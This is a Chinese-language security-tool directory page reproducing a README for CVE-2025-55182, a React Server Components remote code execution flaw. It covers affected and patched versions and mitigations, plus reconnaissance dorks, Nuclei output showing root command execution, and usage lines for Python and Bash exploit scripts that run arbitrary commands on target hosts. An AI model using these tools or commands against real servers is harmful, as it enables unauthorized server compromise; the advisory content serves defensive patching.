Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 一个影响多个包中React Server Components (RSC)实现的严重远程代码执行(RCE)漏洞,包括。 | Kitploit
工具/GitHubGitHub/cyberleelawat/cve-2025-55182
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育Payload 开发
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

一个影响多个包中React Server Components (RSC)实现的严重远程代码执行(RCE)漏洞,包括。

查看仓库
112个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 – React Server Components 远程代码执行

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

创建者 : Virendra Kumar

公司 : Cyber Leelawat

网站 :

www.cyberleelawat.in

概述

CVE-2025-55182 是一个严重的远程代码执行 (RCE) 漏洞,影响多个包中的 React Server Components (RSC) 实现,包括:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

该漏洞源于 RSC 使用的内部 Flight 协议对负载进行不安全反序列化。当某些不受信任的输入通过 HTTP 请求流经 React Server Components 时,可能触发服务器端代码执行。

受影响版本包括:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

补丁版本包括:

  • 19.0.1
  • 19.1.2
  • 19.2.1

漏洞工作原理(高层概述)

React Server Components 接受客户端请求,这些请求在后端被解析和反序列化。该漏洞源于对入站数据反序列化控制不足,使得精心构造的负载可被解释为可执行的服务器端组件。

当这种情况发生时,服务器上可能发生任意 JavaScript 执行,根据托管环境和权限,可能导致服务器完全沦陷。


根本原因

  • 对 RSC Flight 协议流缺乏适当的输入验证
  • 服务器信任边界错误地假设为安全
  • 对不受信任的用户输入的不安全服务器端解析

影响

如果被利用,攻击者可能能够:

  • 实现远程代码执行
  • 执行任意服务器端命令
  • 访问数据库或操作系统级资源
  • 安装恶意软件或后门
  • 窃取敏感数据
  • 在基础设施内部进行横向移动

CVSS 分数: 10.0 – 严重


手动测试(安全防御性识别)

主要目标:

验证应用是否暴露了 React Server Components 以及是否使用了受影响版本。

步骤1 — 通过响应特征检查 RSC 是否存在

root@kitploit:~
curl -I https://target.com/?__rsc=1

Google 侦查(防御性关键词)

这些关键词有助于识别面向公开的仓库或 Web 应用是否引用了 RSC 组件。

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

检查:

  • RSC 功能是否存在?
  • 在前端包中是否可见?
  • 公开的 Git 引用?

内部 Google 查询示例(仅限自有范围)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

仅供内部审计组织自身域名使用。


Shodan(安全技术指纹识别)

检查暴露的框架使用情况,而非漏洞利用。

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA 技术分类仅限

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

自动化测试(内部 / 实验室)

为了对您自己的基础设施进行自动化防御扫描,请克隆基于模板的检测逻辑:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Nuclei 模板

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python RCE 利用脚本 (CVE-2025-55182.py)

功能完备的 RCE 利用脚本,可执行任意命令并获取输出。

用法:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Bash 利用脚本

安装

root@kitploit:~
chmod +x scanner.sh

用法

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

选项

  • -d, --domain - 目标域名/URL(必需)
  • -c, --command - 要执行的命令(默认:id)

示例

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

要求

  • Bash
  • curl
  • openssl

致谢:Bash 和 Python 脚本最初由 @zack0x01 和 @sickwell 创建。使用表示感谢。

仓库内的模板旨在用于:

  • 版本识别
  • 可见性检查
  • 基础设施清单
  • 漏洞意识

重要提示:这些模板仅能在您拥有或获得授权评估的系统上执行。


Nuclei(防御性使用声明)

本仓库中包含的 Nuclei 模板仅用于:

  • 依赖性版本验证
  • 间接指纹识别
  • 被动检查
  • 内部安全审计

请确保:

  • 您拥有书面授权
  • 仅扫描您自己的资产
  • 遵守当地法律和政策

建议的缓解措施

立即更新

升级到以下补丁版本之一:

  • 19.0.1
  • 19.1.2
  • 19.2.1

如果无法立即修补

  • 暂时禁用 RSC 功能
  • 隔离服务器组件
  • 实施 WAF 规则
  • 限制暴露的网络面

🤝 与我联系

👨‍💻 Cyber Leelawat

安全研究员 • 网络安全培训师 • 漏洞赏金猎人

座右铭: 零信任全面安全 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

结论

CVE-2025-55182 是目前对 React 基础设施最严重的威胁之一。由于利用向量的简单性以及未认证的攻击面,强烈建议立即修补。任何运行受影响 RSC 版本的组织应考虑紧急优先处理。


法律/伦理声明

本仓库及文档仅供防御性研究以及您拥有资产的安防验证。任何滥用可能导致非法。您有责任遵守法律和组织政策。

由 Cyber Leelawat 用心制作 ❤️

零信任全面安全 🎯🔐

下载工具